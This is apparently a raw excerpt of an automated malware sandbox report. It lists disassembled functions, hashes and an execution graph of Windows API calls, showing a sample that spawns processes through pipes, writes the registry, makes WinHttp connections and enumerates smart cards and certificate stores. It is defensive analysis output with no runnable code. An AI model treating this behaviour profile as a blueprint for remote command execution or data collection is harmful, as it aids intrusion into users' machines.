                                                                        • Opcode Fuzzy Hash: 89604e51622c1848ae1726d4459ef3f03cb4279c38a613a2a9ea914e2dd1109e
                                                                        • Instruction Fuzzy Hash: A8F0267090020AAAEB04EF55DC06B9E37A86F49314F14506FE800A21A1CBB89F408B5C
                                                                        APIs
                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00431E65
                                                                        • _memmove.LIBCMT ref: 00431EB6
                                                                          • Part of subcall function 00431EF0: std::_Xinvalid_argument.LIBCPMT ref: 00431F0A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd
                                                                        Similarity
                                                                        • API ID: Xinvalid_argumentstd::_$_memmove
                                                                        • String ID: string too long
                                                                        • API String ID: 2168136238-2556327735
                                                                        • Opcode ID: bee2399d89acdff7390fadb7c764c0222abcf93ef081e0b8d32741aa61d96df4
                                                                        • Instruction ID: 9ff1e5a47eb56f93e73d824d9c6d53947e26d97076773c26e80e4cb96c3e41dc
                                                                        • Opcode Fuzzy Hash: bee2399d89acdff7390fadb7c764c0222abcf93ef081e0b8d32741aa61d96df4
                                                                        • Instruction Fuzzy Hash: 1C3109323006104BD7249E5DE98196BF3E9EB9A760F20162FF852C7761C776DC4087A8
                                                                        APIs
                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 00431FF6
                                                                          • Part of subcall function 00432443: std::exception::exception.LIBCMT ref: 00432458
                                                                          • Part of subcall function 00432443: __CxxThrowException@8.LIBCMT ref: 0043246D
                                                                          • Part of subcall function 00432443: std::exception::exception.LIBCMT ref: 0043247E
                                                                        • _memmove.LIBCMT ref: 0043202F
                                                                        Strings
                                                                        • invalid string position, xrefs: 00431FF1
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd
                                                                        Similarity
                                                                        • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                        • String ID: invalid string position
                                                                        • API String ID: 1785806476-1799206989
                                                                        • Opcode ID: 1397517ebf0ae46a801618a01ed36cfdc1a6464828c8918090080f098a212dce
                                                                        • Instruction ID: 6c0ae7a36627a0dfc6bceb10b4348391515713d79e935b59abef4bc461637986
                                                                        • Opcode Fuzzy Hash: 1397517ebf0ae46a801618a01ed36cfdc1a6464828c8918090080f098a212dce
                                                                        • Instruction Fuzzy Hash: F001DB313043108BD3299D5CEE8056AB7BAEB99714F34592FD291C7701D6F5EC46C798
                                                                        APIs
                                                                        • __getptd.LIBCMT ref: 00437E4A
                                                                          • Part of subcall function 00436B4D: __getptd_noexit.LIBCMT ref: 00436B50
                                                                          • Part of subcall function 00436B4D: __amsg_exit.LIBCMT ref: 00436B5D
                                                                        • __getptd.LIBCMT ref: 00437E58
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000009.00000002.2753055164.000000000040B000.00000020.00000001.01000000.00000007.sdmp, Offset: 0040B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_9_2_40b000_uievsid.jbxd
                                                                        Similarity
                                                                        • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                        • String ID: csm
                                                                        • API String ID: 803148776-1018135373
                                                                        • Opcode ID: 5e5b593db96ec5592a6afd293df7648de660035ff22b993f41f96ef09e303681
                                                                        • Instruction ID: 301a8880f988272baa46338c306b3bf3724f51adcf8a0e5165469f776e4bde47
                                                                        • Opcode Fuzzy Hash: 5e5b593db96ec5592a6afd293df7648de660035ff22b993f41f96ef09e303681
                                                                        • Instruction Fuzzy Hash: DF018FB480C2199ACF349F61C44266EB7F6AF18312F24A49FE48096351CB3DAD80CB68

                                                                        Execution Graph

                                                                        Execution Coverage:23.9%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:5.8%
                                                                        Total number of Nodes:882
                                                                        Total number of Limit Nodes:32
                                                                        execution_graph 4501 7ff6aab461f8 4502 7ff6aab4620e 4501->4502 4503 7ff6aab47234 5 API calls 4502->4503 4504 7ff6aab4623c 4503->4504 4505 7ff6aab47234 5 API calls 4504->4505 4506 7ff6aab4625c 4505->4506 4507 7ff6aab4b43c 4508 7ff6aab4b45f 4507->4508 4509 7ff6aab41990 4 API calls 4508->4509 4510 7ff6aab4b46a 4509->4510 4511 7ff6aab41990 4 API calls 4510->4511 4512 7ff6aab4b479 4511->4512 4513 7ff6aab4b49a 4512->4513 4514 7ff6aab4b89d 4512->4514 4515 7ff6aab4b74a 4513->4515 4516 7ff6aab4b4c3 4513->4516 4517 7ff6aab41990 4 API calls 4514->4517 4519 7ff6aab41990 4 API calls 4515->4519 4520 7ff6aab41990 4 API calls 4516->4520 4518 7ff6aab4b8b1 4517->4518 4521 7ff6aab41990 4 API calls 4518->4521 4524 7ff6aab4b75a 4519->4524 4559 7ff6aab4b4d3 4520->4559 4522 7ff6aab4b8c5 4521->4522 4525 7ff6aab41a70 5 API calls 4522->4525 4523 7ff6aab4b739 4526 7ff6aab41990 4 API calls 4523->4526 4527 7ff6aab41990 4 API calls 4524->4527 4528 7ff6aab4b89b 4525->4528 4534 7ff6aab4b748 4526->4534 4530 7ff6aab4b76e 4527->4530 4531 7ff6aab41990 4 API calls 4528->4531 4529 7ff6aab41990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4529->4559 4533 7ff6aab41a70 5 API calls 4530->4533 4532 7ff6aab4b8e6 4531->4532 4533->4534 4535 7ff6aab41990 4 API calls 4534->4535 4536 7ff6aab4b794 SCardListCardsW 4535->4536 4537 7ff6aab4b7cd 4536->4537 4538 7ff6aab4b856 4536->4538 4540 7ff6aab41990 4 API calls 4537->4540 4541 7ff6aab41990 4 API calls 4538->4541 4539 7ff6aab419e4 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4539->4559 4554 7ff6aab4b7dd 4540->4554 4542 7ff6aab4b866 4541->4542 4546 7ff6aab41990 4 API calls 4542->4546 4543 7ff6aab4b53f SCardGetStatusChangeW 4543->4559 4544 7ff6aab4b838 4545 7ff6aab41990 4 API calls 4544->4545 4547 7ff6aab4b847 SCardFreeMemory 4545->4547 4549 7ff6aab4b87a 4546->4549 4551 7ff6aab4b88c 4547->4551 4548 7ff6aab41990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4548->4554 4550 7ff6aab41a70 5 API calls 4549->4550 4550->4551 4552 7ff6aab41990 4 API calls 4551->4552 4552->4528 4553 7ff6aab419e4 4 API calls 4553->4554 4554->4544 4554->4548 4554->4553 4555 7ff6aab41a70 wvsprintfW GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4555->4559 4556 7ff6aab4b5d3 SCardListCardsW 4556->4559 4557 7ff6aab41990 4 API calls 4558 7ff6aab4b68a SCardFreeMemory 4557->4558 4558->4559 4559->4523 4559->4529 4559->4539 4559->4543 4559->4555 4559->4556 4559->4557 3956 7ff6aab473fc 3957 7ff6aab4743f 3956->3957 4004 7ff6aab41990 3957->4004 3959 7ff6aab4746e 4008 7ff6aab41a70 3959->4008 3961 7ff6aab47490 3962 7ff6aab41a70 5 API calls 3961->3962 3963 7ff6aab474a4 3962->3963 4011 7ff6aab478ec 3963->4011 3966 7ff6aab41990 4 API calls 3967 7ff6aab474c5 3966->3967 3968 7ff6aab41a70 5 API calls 3967->3968 3969 7ff6aab474d9 3968->3969 4017 7ff6aab479c4 GetNativeSystemInfo 3969->4017 3972 7ff6aab41990 4 API calls 3973 7ff6aab474fa 3972->3973 4019 7ff6aab47138 CoInitializeEx CoInitializeSecurity CoCreateInstance 3973->4019 3975 7ff6aab47503 3980 7ff6aab475d1 3975->3980 4020 7ff6aab4785c 3975->4020 3976 7ff6aab4783c 4031 7ff6aab47104 3976->4031 3980->3976 3981 7ff6aab4785c 5 API calls 3980->3981 3984 7ff6aab47629 3981->3984 3982 7ff6aab4755b 3983 7ff6aab4785c 5 API calls 3982->3983 3986 7ff6aab47596 3983->3986 3985 7ff6aab4785c 5 API calls 3984->3985 3988 7ff6aab47664 3985->3988 3987 7ff6aab4785c 5 API calls 3986->3987 3987->3980 3989 7ff6aab4785c 5 API calls 3988->3989 3990 7ff6aab4769f 3989->3990 3991 7ff6aab4785c 5 API calls 3990->3991 3992 7ff6aab476da 3991->3992 3993 7ff6aab4785c 5 API calls 3992->3993 3994 7ff6aab47715 3993->3994 3995 7ff6aab4785c 5 API calls 3994->3995 3996 7ff6aab47750 3995->3996 3997 7ff6aab4785c 5 API calls 3996->3997 3998 7ff6aab4778b 3997->3998 3999 7ff6aab4785c 5 API calls 3998->3999 4000 7ff6aab477c6 3999->4000 4001 7ff6aab4785c 5 API calls 4000->4001 4002 7ff6aab47801 4001->4002 4003 7ff6aab4785c 5 API calls 4002->4003 4003->3976 4005 7ff6aab419ad 4004->4005 4034 7ff6aab41918 4005->4034 4007 7ff6aab419ba 4007->3959 4009 7ff6aab41918 4 API calls 4008->4009 4010 7ff6aab41a96 wvsprintfW 4009->4010 4010->3961 4012 7ff6aab47918 4011->4012 4012->4012 4013 7ff6aab47977 LoadLibraryA GetProcAddress 4012->4013 4014 7ff6aab474a9 4013->4014 4015 7ff6aab47991 GetCurrentProcess IsWow64Process 4013->4015 4014->3966 4015->4014 4016 7ff6aab479ad 4015->4016 4016->4014 4018 7ff6aab474de 4017->4018 4018->3972 4019->3975 4021 7ff6aab41990 4 API calls 4020->4021 4022 7ff6aab47888 4021->4022 4023 7ff6aab41990 4 API calls 4022->4023 4024 7ff6aab47893 4023->4024 4025 7ff6aab41990 4 API calls 4024->4025 4026 7ff6aab478a2 4025->4026 4044 7ff6aab47034 4026->4044 4029 7ff6aab41990 4 API calls 4030 7ff6aab478d5 4029->4030 4030->3982 4033 7ff6aab47116 CoUninitialize 4031->4033 4035 7ff6aab4192e 4034->4035 4036 7ff6aab41951 4034->4036 4035->4035 4038 7ff6aab42654 4035->4038 4036->4007 4039 7ff6aab42669 GetProcessHeap RtlReAllocateHeap 4038->4039 4040 7ff6aab42682 4038->4040 4041 7ff6aab4268a 4039->4041 4043 7ff6aab425dc GetProcessHeap HeapAlloc 4040->4043 4041->4036 4045 7ff6aab47079 4044->4045 4046 7ff6aab4707d 4045->4046 4048 7ff6aab46004 4045->4048 4046->4029 4049 7ff6aab4601a 4048->4049 4052 7ff6aab47234 4049->4052 4061 7ff6aab47310 4052->4061 4055 7ff6aab46042 4056 7ff6aab41990 4 API calls 4057 7ff6aab47275 4056->4057 4075 7ff6aab419e4 4057->4075 4058 7ff6aab41990 4 API calls 4058->4055 4060 7ff6aab47260 4060->4058 4062 7ff6aab4733e 4061->4062 4063 7ff6aab47381 4062->4063 4064 7ff6aab47362 4062->4064 4065 7ff6aab473bb 4063->4065 4066 7ff6aab47395 4063->4066 4069 7ff6aab41a70 5 API calls 4064->4069 4067 7ff6aab41990 4 API calls 4065->4067 4072 7ff6aab41a70 5 API calls 4066->4072 4068 7ff6aab473ca 4067->4068 4071 7ff6aab41990 4 API calls 4068->4071 4070 7ff6aab47251 4069->4070 4070->4055 4070->4056 4070->4060 4073 7ff6aab473d5 4071->4073 4072->4070 4074 7ff6aab41990 4 API calls 4073->4074 4074->4070 4080 7ff6aab47dc8 4075->4080 4081 7ff6aab47de9 4080->4081 4084 7ff6aab425dc GetProcessHeap HeapAlloc 4081->4084 4493 7ff6aab431c4 4494 7ff6aab431d7 4493->4494 4495 7ff6aab41990 4 API calls 4494->4495 4496 7ff6aab431e2 4495->4496 4497 7ff6aab41990 4 API calls 4496->4497 4498 7ff6aab431f1 CertEnumSystemStoreLocation 4497->4498 4499 7ff6aab41990 4 API calls 4498->4499 4500 7ff6aab43215 4499->4500 4560 7ff6aab4e3c0 lstrcpyW PathAppendW 4561 7ff6aab4e437 4560->4561 4576 7ff6aab4cd0c RegGetValueW 4561->4576 4564 7ff6aab4e4ce 4565 7ff6aab41990 4 API calls 4566 7ff6aab4e48a 4565->4566 4567 7ff6aab419e4 4 API calls 4566->4567 4568 7ff6aab4e495 4567->4568 4569 7ff6aab41990 4 API calls 4568->4569 4570 7ff6aab4e4a4 4569->4570 4571 7ff6aab419e4 4 API calls 4570->4571 4572 7ff6aab4e4b3 4571->4572 4573 7ff6aab41990 4 API calls 4572->4573 4574 7ff6aab4e4c2 4573->4574 4575 7ff6aab425b4 2 API calls 4574->4575 4575->4564 4577 7ff6aab4cd55 4576->4577 4581 7ff6aab4cd94 4576->4581 4583 7ff6aab42588 GetProcessHeap HeapAlloc 4577->4583 4581->4564 4581->4565 4584 7ff6aab4250c 4589 7ff6aab4213c 4584->4589 4587 7ff6aab4253b 4632 7ff6aab41c80 4589->4632 4592 7ff6aab425b4 2 API calls 4593 7ff6aab4219e 4592->4593 4594 7ff6aab424e6 4593->4594 4595 7ff6aab421ba WinHttpCrackUrl 4593->4595 4594->4587 4621 7ff6aab41eec 4594->4621 4596 7ff6aab421e6 4595->4596 4597 7ff6aab424dd WinHttpCloseHandle 4595->4597 4598 7ff6aab421f7 WinHttpConnect 4596->4598 4597->4594 4598->4597 4599 7ff6aab42225 4598->4599 4599->4599 4600 7ff6aab4228b WinHttpOpenRequest 4599->4600 4601 7ff6aab424cd WinHttpCloseHandle 4600->4601 4602 7ff6aab422ba 4600->4602 4601->4597 4603 7ff6aab422c0 WinHttpQueryOption WinHttpSetOption 4602->4603 4604 7ff6aab42304 WinHttpSendRequest 4602->4604 4603->4604 4605 7ff6aab4232b WinHttpReceiveResponse 4604->4605 4606 7ff6aab424c4 WinHttpCloseHandle 4604->4606 4605->4606 4607 7ff6aab4233e 4605->4607 4606->4601 4608 7ff6aab4e7e0 2 API calls 4607->4608 4609 7ff6aab4234d WinHttpQueryDataAvailable 4608->4609 4610 7ff6aab4e6f0 4 API calls 4609->4610 4611 7ff6aab4236d WinHttpReadData 4610->4611 4612 7ff6aab4238b 4611->4612 4612->4609 4613 7ff6aab4e740 4 API calls 4612->4613 4615 7ff6aab4239f 4612->4615 4613->4612 4614 7ff6aab424ba 4614->4606 4615->4614 4615->4615 4636 7ff6aab47a60 4615->4636 4660 7ff6aab41de8 4621->4660 4624 7ff6aab42121 4624->4587 4625 7ff6aab41f5e SysAllocString SafeArrayCreateVector SafeArrayAccessData 4626 7ff6aab4262c 4625->4626 4627 7ff6aab41fa8 SafeArrayUnaccessData 4626->4627 4630 7ff6aab41fd9 4627->4630 4628 7ff6aab41ffe SysFreeString 4628->4624 4630->4628 4631 7ff6aab41cbc 11 API calls 4630->4631 4631->4628 4633 7ff6aab41ca1 4632->4633 4634 7ff6aab41ca5 WinHttpOpen 4633->4634 4635 7ff6aab479f0 2 API calls 4633->4635 4634->4592 4635->4634 4637 7ff6aab47a84 4636->4637 4639 7ff6aab424a5 4636->4639 4648 7ff6aab425dc GetProcessHeap HeapAlloc 4637->4648 4640 7ff6aab41cbc 4639->4640 4649 7ff6aab4a534 4640->4649 4650 7ff6aab4a565 4649->4650 4659 7ff6aab425dc GetProcessHeap HeapAlloc 4650->4659 4666 7ff6aab41b74 4660->4666 4662 7ff6aab41e06 RegCreateKeyExA 4663 7ff6aab41e3f CoInitializeEx VariantInit CoCreateInstance 4662->4663 4664 7ff6aab41e46 4662->4664 4663->4624 4663->4625 4664->4664 4665 7ff6aab41ea2 RegSetValueExA RegCloseKey 4664->4665 4665->4663 4667 7ff6aab41bc3 4666->4667 4667->4662 4199 7ff6aab49ac8 4200 7ff6aab49af7 4199->4200 4201 7ff6aab41990 4 API calls 4200->4201 4202 7ff6aab49b02 4201->4202 4336 7ff6aab49644 4202->4336 4204 7ff6aab49b0b 4204->4204 4341 7ff6aab4900c 4204->4341 4207 7ff6aab4a4fb 4209 7ff6aab41990 4 API calls 4207->4209 4210 7ff6aab4a513 4209->4210 4211 7ff6aab49b7c 4211->4207 4376 7ff6aab497dc 4211->4376 4214 7ff6aab41990 4 API calls 4215 7ff6aab49bb6 4214->4215 4216 7ff6aab497dc 16 API calls 4215->4216 4217 7ff6aab49bce 4216->4217 4217->4207 4218 7ff6aab41990 4 API calls 4217->4218 4219 7ff6aab49be1 4218->4219 4220 7ff6aab497dc 16 API calls 4219->4220 4221 7ff6aab49bf9 4220->4221 4221->4207 4222 7ff6aab41990 4 API calls 4221->4222 4223 7ff6aab49c0c 4222->4223 4224 7ff6aab497dc 16 API calls 4223->4224 4225 7ff6aab49c24 4224->4225 4225->4207 4226 7ff6aab41990 4 API calls 4225->4226 4227 7ff6aab49c37 4226->4227 4228 7ff6aab497dc 16 API calls 4227->4228 4229 7ff6aab49c4f 4228->4229 4229->4207 4230 7ff6aab41990 4 API calls 4229->4230 4231 7ff6aab49c62 4230->4231 4232 7ff6aab497dc 16 API calls 4231->4232 4233 7ff6aab49c7a 4232->4233 4233->4207 4234 7ff6aab41990 4 API calls 4233->4234 4235 7ff6aab49c8d 4234->4235 4236 7ff6aab497dc 16 API calls 4235->4236 4237 7ff6aab49ca5 4236->4237 4237->4207 4238 7ff6aab41990 4 API calls 4237->4238 4239 7ff6aab49cb8 4238->4239 4240 7ff6aab497dc 16 API calls 4239->4240 4241 7ff6aab49cd0 4240->4241 4241->4207 4242 7ff6aab41990 4 API calls 4241->4242 4243 7ff6aab49ce3 4242->4243 4244 7ff6aab497dc 16 API calls 4243->4244 4245 7ff6aab49cfb 4244->4245 4245->4207 4246 7ff6aab41990 4 API calls 4245->4246 4247 7ff6aab49d0e 4246->4247 4248 7ff6aab497dc 16 API calls 4247->4248 4249 7ff6aab49d26 4248->4249 4249->4207 4250 7ff6aab41990 4 API calls 4249->4250 4251 7ff6aab49d39 4250->4251 4252 7ff6aab497dc 16 API calls 4251->4252 4253 7ff6aab49d51 4252->4253 4253->4207 4254 7ff6aab41990 4 API calls 4253->4254 4255 7ff6aab49d64 4254->4255 4256 7ff6aab497dc 16 API calls 4255->4256 4257 7ff6aab49d7c 4256->4257 4257->4207 4258 7ff6aab41990 4 API calls 4257->4258 4259 7ff6aab49d8f 4258->4259 4260 7ff6aab497dc 16 API calls 4259->4260 4261 7ff6aab49da7 4260->4261 4261->4207 4262 7ff6aab41990 4 API calls 4261->4262 4263 7ff6aab49dba 4262->4263 4264 7ff6aab497dc 16 API calls 4263->4264 4265 7ff6aab49dd2 4264->4265 4265->4207 4266 7ff6aab41990 4 API calls 4265->4266 4267 7ff6aab49de5 4266->4267 4267->4267 4268 7ff6aab497dc 16 API calls 4267->4268 4269 7ff6aab49e45 4268->4269 4269->4207 4270 7ff6aab41990 4 API calls 4269->4270 4271 7ff6aab49e58 4270->4271 4271->4271 4272 7ff6aab497dc 16 API calls 4271->4272 4273 7ff6aab49eb4 4272->4273 4273->4207 4274 7ff6aab41990 4 API calls 4273->4274 4275 7ff6aab49ec7 4274->4275 4275->4275 4276 7ff6aab497dc 16 API calls 4275->4276 4277 7ff6aab49f2d 4276->4277 4277->4207 4278 7ff6aab41990 4 API calls 4277->4278 4279 7ff6aab49f40 4278->4279 4279->4279 4280 7ff6aab497dc 16 API calls 4279->4280 4281 7ff6aab49f97 4280->4281 4281->4207 4282 7ff6aab41990 4 API calls 4281->4282 4283 7ff6aab49fb1 4282->4283 4283->4283 4284 7ff6aab497dc 16 API calls 4283->4284 4285 7ff6aab4a006 4284->4285 4285->4207 4286 7ff6aab41990 4 API calls 4285->4286 4287 7ff6aab4a019 4286->4287 4287->4287 4288 7ff6aab497dc 16 API calls 4287->4288 4289 7ff6aab4a079 4288->4289 4289->4207 4290 7ff6aab41990 4 API calls 4289->4290 4291 7ff6aab4a08c 4290->4291 4291->4291 4292 7ff6aab497dc 16 API calls 4291->4292 4293 7ff6aab4a0e2 4292->4293 4293->4207 4294 7ff6aab41990 4 API calls 4293->4294 4295 7ff6aab4a0f9 4294->4295 4295->4295 4296 7ff6aab497dc 16 API calls 4295->4296 4297 7ff6aab4a157 4296->4297 4297->4207 4298 7ff6aab41990 4 API calls 4297->4298 4299 7ff6aab4a16e 4298->4299 4299->4299 4300 7ff6aab497dc 16 API calls 4299->4300 4301 7ff6aab4a1c8 4300->4301 4301->4207 4302 7ff6aab41990 4 API calls 4301->4302 4303 7ff6aab4a1df 4302->4303 4303->4303 4304 7ff6aab497dc 16 API calls 4303->4304 4305 7ff6aab4a227 4304->4305 4305->4207 4306 7ff6aab41990 4 API calls 4305->4306 4307 7ff6aab4a23e 4306->4307 4307->4307 4308 7ff6aab497dc 16 API calls 4307->4308 4309 7ff6aab4a290 4308->4309 4309->4207 4310 7ff6aab41990 4 API calls 4309->4310 4311 7ff6aab4a2a7 4310->4311 4311->4311 4312 7ff6aab497dc 16 API calls 4311->4312 4313 7ff6aab4a2ee 4312->4313 4313->4207 4314 7ff6aab41990 4 API calls 4313->4314 4315 7ff6aab4a305 4314->4315 4315->4315 4316 7ff6aab497dc 16 API calls 4315->4316 4317 7ff6aab4a359 4316->4317 4317->4207 4318 7ff6aab41990 4 API calls 4317->4318 4319 7ff6aab4a370 4318->4319 4319->4319 4320 7ff6aab497dc 16 API calls 4319->4320 4321 7ff6aab4a3bc 4320->4321 4321->4207 4322 7ff6aab41990 4 API calls 4321->4322 4323 7ff6aab4a3d6 4322->4323 4323->4323 4324 7ff6aab497dc 16 API calls 4323->4324 4325 7ff6aab4a437 4324->4325 4325->4207 4326 7ff6aab41990 4 API calls 4325->4326 4327 7ff6aab4a44a 4326->4327 4327->4327 4328 7ff6aab497dc 16 API calls 4327->4328 4329 7ff6aab4a499 4328->4329 4329->4207 4330 7ff6aab41990 4 API calls 4329->4330 4331 7ff6aab4a4a8 4330->4331 4331->4331 4332 7ff6aab497dc 16 API calls 4331->4332 4333 7ff6aab4a4ee 4332->4333 4333->4207 4334 7ff6aab4a4f2 4333->4334 4425 7ff6aab49478 4334->4425 4441 7ff6aab4e7e0 4336->4441 4339 7ff6aab4e7e0 2 API calls 4340 7ff6aab49672 4339->4340 4340->4204 4445 7ff6aab42554 4341->4445 4344 7ff6aab49069 4349 7ff6aab41990 4 API calls 4344->4349 4345 7ff6aab490a3 CreatePipe 4346 7ff6aab490e8 CreatePipe 4345->4346 4347 7ff6aab490c1 4345->4347 4348 7ff6aab49106 4346->4348 4352 7ff6aab49130 4346->4352 4350 7ff6aab41990 4 API calls 4347->4350 4354 7ff6aab41990 4 API calls 4348->4354 4351 7ff6aab4907d GetLastError 4349->4351 4353 7ff6aab490d5 GetLastError 4350->4353 4356 7ff6aab4908e 4351->4356 4447 7ff6aab47cfc 4352->4447 4353->4356 4355 7ff6aab4911a GetLastError 4354->4355 4355->4356 4357 7ff6aab41a70 5 API calls 4356->4357 4359 7ff6aab4909c 4357->4359 4359->4207 4368 7ff6aab495a0 WaitForSingleObject 4359->4368 4360 7ff6aab4917b CreateProcessW 4361 7ff6aab425b4 2 API calls 4360->4361 4362 7ff6aab491c7 4361->4362 4363 7ff6aab491cb 4362->4363 4364 7ff6aab491f5 CloseHandle 4362->4364 4365 7ff6aab41990 4 API calls 4363->4365 4364->4359 4366 7ff6aab491df GetLastError 4365->4366 4367 7ff6aab491f0 4366->4367 4367->4364 4369 7ff6aab495c3 4368->4369 4371 7ff6aab49600 4368->4371 4370 7ff6aab495d4 4369->4370 4452 7ff6aab4968c PeekNamedPipe 4369->4452 4370->4371 4373 7ff6aab495ee GetExitCodeProcess 4370->4373 4374 7ff6aab4968c 6 API calls 4370->4374 4371->4211 4373->4371 4375 7ff6aab495ea 4374->4375 4375->4371 4375->4373 4377 7ff6aab41990 4 API calls 4376->4377 4378 7ff6aab49813 4377->4378 4378->4378 4379 7ff6aab41990 4 API calls 4378->4379 4380 7ff6aab49877 4379->4380 4381 7ff6aab479f0 2 API calls 4380->4381 4382 7ff6aab4987f 4381->4382 4383 7ff6aab419e4 4 API calls 4382->4383 4384 7ff6aab4988d 4383->4384 4385 7ff6aab425b4 2 API calls 4384->4385 4386 7ff6aab49895 4385->4386 4387 7ff6aab41990 4 API calls 4386->4387 4388 7ff6aab498a4 4387->4388 4466 7ff6aab49224 GetSystemTimeAsFileTime 4388->4466 4391 7ff6aab4e6f0 4 API calls 4392 7ff6aab498cd 4391->4392 4393 7ff6aab4e6f0 4 API calls 4392->4393 4394 7ff6aab498ed 4393->4394 4395 7ff6aab499cf 4394->4395 4397 7ff6aab41990 4 API calls 4394->4397 4396 7ff6aab41a70 5 API calls 4395->4396 4399 7ff6aab499ef 4396->4399 4398 7ff6aab4993f 4397->4398 4400 7ff6aab49943 4398->4400 4401 7ff6aab49950 4398->4401 4402 7ff6aab41990 4 API calls 4399->4402 4403 7ff6aab419e4 4 API calls 4400->4403 4405 7ff6aab479f0 2 API calls 4401->4405 4404 7ff6aab499fe 4402->4404 4406 7ff6aab4994e 4403->4406 4404->4207 4404->4214 4407 7ff6aab49958 4405->4407 4410 7ff6aab41990 4 API calls 4406->4410 4408 7ff6aab419e4 4 API calls 4407->4408 4409 7ff6aab49966 4408->4409 4411 7ff6aab425b4 2 API calls 4409->4411 4412 7ff6aab4997d 4410->4412 4411->4406 4413 7ff6aab41990 4 API calls 4412->4413 4414 7ff6aab49991 4413->4414 4415 7ff6aab499a2 4414->4415 4416 7ff6aab49995 4414->4416 4418 7ff6aab479f0 2 API calls 4415->4418 4417 7ff6aab419e4 4 API calls 4416->4417 4420 7ff6aab499a0 4417->4420 4419 7ff6aab499aa 4418->4419 4421 7ff6aab419e4 4 API calls 4419->4421 4423 7ff6aab41990 4 API calls 4420->4423 4422 7ff6aab499b8 4421->4422 4424 7ff6aab425b4 2 API calls 4422->4424 4423->4395 4424->4420 4487 7ff6aab4971c 4425->4487 4428 7ff6aab494cf 4429 7ff6aab494fc WaitForSingleObject 4428->4429 4430 7ff6aab4968c 6 API calls 4428->4430 4432 7ff6aab49540 4428->4432 4439 7ff6aab49534 TerminateProcess 4428->4439 4431 7ff6aab49512 GetSystemTimeAsFileTime 4429->4431 4433 7ff6aab4954d 4429->4433 4430->4428 4431->4428 4432->4207 4433->4432 4434 7ff6aab49563 4433->4434 4435 7ff6aab4968c 6 API calls 4433->4435 4434->4432 4436 7ff6aab4957d GetExitCodeProcess 4434->4436 4437 7ff6aab4968c 6 API calls 4434->4437 4435->4434 4436->4432 4438 7ff6aab4958f CloseHandle 4436->4438 4440 7ff6aab49579 4437->4440 4438->4432 4439->4432 4440->4432 4440->4436 4444 7ff6aab425dc GetProcessHeap HeapAlloc 4441->4444 4443 7ff6aab4965f 4443->4339 4446 7ff6aab42561 CreatePipe 4445->4446 4446->4344 4446->4345 4448 7ff6aab47d0e 4447->4448 4451 7ff6aab425dc GetProcessHeap HeapAlloc 4448->4451 4450 7ff6aab47d1d 4450->4360 4453 7ff6aab496c2 4452->4453 4454 7ff6aab496ca 4452->4454 4453->4454 4459 7ff6aab4e6f0 4453->4459 4454->4370 4457 7ff6aab49701 4463 7ff6aab4e740 4457->4463 4460 7ff6aab4e70d 4459->4460 4462 7ff6aab496dc ReadFile 4459->4462 4460->4460 4461 7ff6aab42654 4 API calls 4460->4461 4461->4462 4462->4454 4462->4457 4464 7ff6aab4e6f0 4 API calls 4463->4464 4465 7ff6aab4e755 4464->4465 4465->4454 4467 7ff6aab49264 4466->4467 4486 7ff6aab425dc GetProcessHeap HeapAlloc 4467->4486 4469 7ff6aab492b1 4470 7ff6aab4971c WriteFile 4469->4470 4471 7ff6aab492fe 4470->4471 4472 7ff6aab425b4 GetProcessHeap RtlFreeHeap 4471->4472 4473 7ff6aab49306 4472->4473 4474 7ff6aab493a2 WaitForSingleObject 4473->4474 4475 7ff6aab4968c 6 API calls 4473->4475 4477 7ff6aab493f5 4473->4477 4478 7ff6aab49418 WaitForSingleObject 4473->4478 4483 7ff6aab493e9 TerminateProcess 4473->4483 4476 7ff6aab493b8 GetSystemTimeAsFileTime 4474->4476 4474->4477 4475->4473 4476->4473 4477->4391 4478->4477 4479 7ff6aab4942e 4478->4479 4480 7ff6aab4943e 4479->4480 4481 7ff6aab4968c 6 API calls 4479->4481 4480->4477 4482 7ff6aab49458 GetExitCodeProcess 4480->4482 4484 7ff6aab4968c 6 API calls 4480->4484 4481->4480 4482->4477 4483->4477 4485 7ff6aab49454 4484->4485 4485->4477 4485->4482 4490 7ff6aab4974b 4487->4490 4489 7ff6aab494ba GetSystemTimeAsFileTime 4489->4428 4490->4489 4491 7ff6aab497a4 WriteFile 4490->4491 4492 7ff6aab497c7 4491->4492 4492->4490 4675 7ff6aab46b94 4676 7ff6aab46bbf 4675->4676 4676->4676 4677 7ff6aab47234 5 API calls 4676->4677 4678 7ff6aab46c2e 4677->4678 4679 7ff6aab47234 5 API calls 4678->4679 4680 7ff6aab46c9d 4679->4680 4681 7ff6aab47234 5 API calls 4680->4681 4682 7ff6aab46d09 4681->4682 4683 7ff6aab414d4 4684 7ff6aab41507 4683->4684 4685 7ff6aab414ea 4683->4685 4685->4684 4686 7ff6aab41501 RemoveVectoredExceptionHandler 4685->4686 4686->4684 4687 7ff6aab468d4 4688 7ff6aab468f7 4687->4688 4688->4688 4689 7ff6aab47234 5 API calls 4688->4689 4690 7ff6aab46971 4689->4690 4691 7ff6aab47234 5 API calls 4690->4691 4692 7ff6aab46990 4691->4692 4693 7ff6aab47234 5 API calls 4692->4693 4694 7ff6aab469af 4693->4694 4697 7ff6aab472d4 4694->4697 4698 7ff6aab47310 5 API calls 4697->4698 4700 7ff6aab472f1 4698->4700 4699 7ff6aab469ce 4700->4699 4701 7ff6aab41a70 5 API calls 4700->4701 4701->4699 4702 